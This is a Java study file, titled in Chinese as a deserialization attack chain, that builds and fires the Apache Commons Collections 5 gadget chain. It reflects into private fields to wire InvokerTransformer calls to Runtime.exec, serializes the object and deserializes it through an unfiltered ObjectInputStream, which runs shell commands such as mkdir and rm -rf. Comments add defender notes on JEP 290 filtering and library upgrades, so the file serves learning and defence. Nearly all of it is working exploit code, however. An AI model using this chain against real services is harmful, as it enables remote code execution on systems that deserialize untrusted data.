java 反序列化漏洞 攻击利用链

参考原文

  https://f5.pm/go-45329.html

exec.java

        package safe;
        
        
        import org.apache.commons.collections.Transformer;
        import org.apache.commons.collections.functors.ChainedTransformer;
        import org.apache.commons.collections.functors.ConstantTransformer;
        import org.apache.commons.collections.functors.InvokerTransformer;
        import org.apache.commons.collections.keyvalue.TiedMapEntry;
        import org.apache.commons.collections.map.LazyMap;
        
        import javax.management.BadAttributeValueExpException;
        import java.io.*;
        import java.lang.reflect.Field;
        import java.util.HashMap;
        import java.util.Map;
        
        /**
         * Self-contained demonstration of a Java native-deserialization gadget chain built from
         * Apache Commons Collections 3.x transformers (the shape ysoserial calls CommonsCollections5).
         *
         * <p>Flow of {@link #main}: build the gadget object, serialize it to a file, read the file back
         * and hand the bytes to an unfiltered {@link ObjectInputStream#readObject()}. That last call is
         * the vulnerable sink; everything before it only prepares the input. Side effects of running this
         * class are process executions ({@code mkdir ./test}, {@code mkdir ./test66}, {@code rm -rf ./test66})
         * and a file written to a hard-coded path.
         *
         * <p>Defender notes: the trigger path (readObject → val.toString() → TiedMapEntry.getValue() →
         * LazyMap.get() → transformer chain) lives entirely in JDK and library classes, so no application
         * code needs to "use" the gadget for it to fire. Mitigations are an {@code ObjectInputFilter}
         * (JEP 290) allow-list on every {@code ObjectInputStream} fed untrusted bytes, not exposing native
         * deserialization to untrusted input at all, and keeping commons-collections at 3.2.2+ where
         * deserialization of these functors is disabled unless explicitly re-enabled.
         */
        public class Exec  {
        
            /**
             * Builds the serializable gadget object.
             *
             * <p>The returned {@link BadAttributeValueExpException} has its private {@code val} field set by
             * reflection to a {@link TiedMapEntry} over a {@link LazyMap}. The LazyMap is decorated with a
             * {@link ChainedTransformer} that is first constructed with a harmless
             * {@code ConstantTransformer(1)} and only afterwards has its private {@code iTransformers}
             * field swapped (again by reflection) to the real chain
             * {@code Runtime.class → getMethod("getRuntime") → invoke(null) → exec(command)}.
             * Presumably the inert-then-swap ordering is there so nothing can trigger the real chain
             * while the object graph is being assembled locally — TODO confirm against the referenced
             * write-up.
             *
             * @param command single argument passed to {@code Runtime.exec(String)} when the chain fires
             * @return the gadget object, ready to be serialized
             * @throws Exception on any reflection failure (missing field, inaccessible field)
             */
            private static BadAttributeValueExpException getObject(final String command) throws Exception {
                final String[] execArgs = new String[] { command };
                // inert chain for setup
                final Transformer transformerChain = new ChainedTransformer(
                        new Transformer[]{ new ConstantTransformer(1) });
                // real chain for after setup
                final Transformer[] transformers = new Transformer[] {
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod", new Class[] {
                                String.class, Class[].class }, new Object[] {
                                "getRuntime", new Class[0] }),
                        new InvokerTransformer("invoke", new Class[] {
                                Object.class, Object[].class }, new Object[] {
                                null, new Object[0] }),
                        new InvokerTransformer("exec",
                                new Class[] { String.class }, execArgs),
                        new ConstantTransformer(1) };
        
                // raw Map types as in the original; the backing map stays empty so every key is a LazyMap miss
                final Map innerMap = new HashMap();
        
                final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        
                // the key is arbitrary; it is only what LazyMap will be asked for
                TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
        
                // val is private with no setter, so it is written by reflection
                BadAttributeValueExpException val = new BadAttributeValueExpException(null);
                Field valfield = val.getClass().getDeclaredField("val");
                valfield.setAccessible(true);
                valfield.set(val, entry);
                Class aClass = transformerChain.getClass();
        
                // swap the inert single-element chain for the real one after the object graph is wired
                Field iTransformers = aClass.getDeclaredField("iTransformers");
                iTransformers.setAccessible(true);
                iTransformers.set(transformerChain,transformers);
        
                return val;
            }
        
            /**
             * Entry point: serializes the gadget to disk, reads it back and deserializes it.
             *
             * <p>The {@code rm -rf ./test66} before {@code readObject()} removes any directory left by a
             * previous run, so the directory existing afterwards shows that the chain executed during
             * deserialization alone.
             *
             * <p>NOTE(review): {@code filePath} is duplicated verbatim inside {@link #fileRead()}; the
             * {@code ObjectInputStream} is never closed; {@code o} is unused; {@code new String(bytes1)}
             * decodes binary data with the platform charset and is for display only.
             *
             * @param args ignored
             * @throws Exception propagated from gadget construction, serialization or deserialization
             */
            public static void main(String[] args) throws Exception {
                String filePath="/Users/c/IdeaProjects/learnSpace/learn/a.txt";
                testInvokerTransformer();
        
                BadAttributeValueExpException calc = getObject("mkdir ./test66");
        
                ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();// output stream holding the serialized byte array of the gadget object (original comment said "person object", copied from a generic example)
        
                ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
                objectOutputStream.writeObject(calc);// serialize the object
                objectOutputStream.flush();
        
                objectOutputStream.close();
        
                byte[] bytes1 = byteArrayOutputStream.toByteArray(); // fetch the serialized bytes
                fileWrite(bytes1,filePath);
                System.out.println(new String(bytes1));
        //
        //        String ss="detailMessaget\u0000\u0012Ljava/lang/String;[\u0000\n" +
        //                "stackTracet\u0000\u001E[Ljava/lang/StackTraceElement;L\u0000\u0014suppressedExceptionst\u0000\u0010Ljava/util/List;xpq\u0000~pur\u0000\u001E[Ljava.lang.StackTraceElement;\u0002F*<<�\"9\u0002\u0000\u0000xp\u0000\u0000\u0000\u0002sr\u0000\u001Bjava.lang.StackTraceElementa\tŚ&6݅\u0002\u0000\u0004I\u0000\n" +
        //                "lineNumberL\u0000\u000EdeclaringClassq\u0000~\u0000\u0005LfileNameq\u0000~\u0000\u0005L\u0000\n" +
        //                "iTransformerst\u0000-[Lorg/apache/commons/collections/Transformer;xpur\u0000-[Lorg.apache.commons.collections.Transformer;�V*��4\u0018�\u0002\u0000\u0000xp\u0000\u0000\u0000\u0005sr\u0000;org.apache.commons.collections.functors.ConstantTransformerXv�\u0011A\u0002��\u0002\u0000\u0001L\u0000\tiConstantq\u0000~\u0000\u0001xpvr\u0000\u0011java.lang.Runtime\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000xpsr\u0000:org.apache.commons.collections.functors.InvokerTransformer���k{|�8\u0002\u0000\u0003[\u0000\u0005iArgst\u0000\u0013[Ljava/lang/Object;L\u0000\u000BiMethodNameq\u0000~\u0000\u0005[\u0000\u000BiParamTypest\u0000\u0012[Ljava/lang/Class;xpur\u0000\u0013[Ljava.lang.Object;��X�\u0010s)l\u0002\u0000\u0000xp\u0000\u0000\u0000\u0002t\u0000\n" +
        //                "getRuntimeur\u0000\u0012[Ljava.lang.Class;�\u0016\u05EE��Z�\u0002\u0000\u0000xp\u0000\u0000\u0000\u0000t\u0000\tgetMethoduq\u0000~\u0000/\u0000\u0000\u0000\u0002vr\u0000\u0010java.lang.String��8z;�B\u0002\u0000\u0000xpvq\u0000~\u0000/sq\u0000~\u0000(uq\u0000~\u0000,\u0000\u0000\u0000\u0002puq\u0000~\u0000,\u0000\u0000\u0000\u0000t\u0000\u0006invokeuq\u0000~\u0000/\u0000\u0000\u0000\u0002vr\u0000\u0010java.lang.Object\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000xpvq\u0000~\u0000,sq\u0000~\u0000(ur\u0000\u0013[Ljava.lang.String;��V��\u001D{G\u0002\u0000\u0000xp\u0000\u0000\u0000\u0001t\u0000\u000Emkdir ./test66t\u0000\u0004execuq\u0000~\u0000/\u0000\u0000\u0000\u0001q\u0000~\u00004sq\u0000~\u0000$sr\u0000\u0011java.lang.Integer\u0012⠤���8\u0002\u0000\u0001I\u0000\u0005valuexr\u0000\u0010java.lang.Number���\u001D\u000B���\u0002\u0000\u0000xp\u0000\u0000\u0000\u0001sr\u0000\u0011java.util.HashMap\u0005\u0007���\u0016`�\u0003\u0000\u0002F\u0000\n" +
        //                "loadFactorI\u0000\tthresholdxp?@\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0010\u0000\u0000\u0000\u0000xx";
        ////        byte[] bytes=ss.getBytes("UTF-8");
                byte[] bytes=fileRead();
                // clean up the marker directory so a fresh one can only come from the deserialization below
                Runtime.getRuntime().exec("rm -rf ./test66");
                ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);// input stream over the byte array
        
                // VULNERABLE SINK: unfiltered ObjectInputStream over bytes read from a file.
                // In real code this stream must carry an ObjectInputFilter (JEP 290) allow-list, or native
                // deserialization of externally supplied bytes must be avoided altogether.
                ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
                Object o = objectInputStream.readObject(); // deserialize from the byte stream — the chain fires here
                System.out.println();
        
            }
        
        
            /**
             * Shows the reflective-call primitive on its own, without any deserialization:
             * {@link InvokerTransformer#transform} invokes {@code exec(String)} on the Runtime it is given.
             * Side effect: runs {@code mkdir ./test} in the working directory.
             */
            private static void testInvokerTransformer(){
                InvokerTransformer t1=new InvokerTransformer("exec",new Class[]{ String.class},new Object[]{"mkdir ./test"});
        
                t1.transform(Runtime.getRuntime());
            }
        
        
            /**
             * Reads the serialized gadget back from the hard-coded path used by {@link #main}.
             *
             * <p>NOTE(review): the path duplicates {@code filePath} in main; the single {@code read} call
             * may return fewer bytes than {@code file.length()}; the stream is not closed if an exception is
             * thrown before {@code close()}; any exception is printed and swallowed, returning a partially
             * filled or all-zero array.
             *
             * @return the file contents (possibly zero-filled on error, see note above)
             */
            private static byte[] fileRead(){
                File file = new File("/Users/c/IdeaProjects/learnSpace/learn/a.txt");
                FileInputStream fileInputStream = null;
                byte[] bFile = new byte[(int) file.length()];
                try {
                    fileInputStream = new FileInputStream(file);
                    fileInputStream.read(bFile);
                    fileInputStream.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
                return bFile;
            }
            /**
             * Writes {@code bytes} to {@code path}, overwriting any existing file.
             *
             * <p>NOTE(review): the stream is not closed on exception and errors are printed and swallowed,
             * so a failed write is not reported to the caller.
             *
             * @param bytes serialized object bytes to persist
             * @param path destination file path
             */
            private static void fileWrite(byte[] bytes,String path){
        
                FileOutputStream fileOutputStream = null;
                try {
                    fileOutputStream = new FileOutputStream(path);
                    fileOutputStream.write(bytes);
                    fileOutputStream.close();
                } catch (Exception e) {
                    e.printStackTrace();
                }
        
            }
        
        
        }
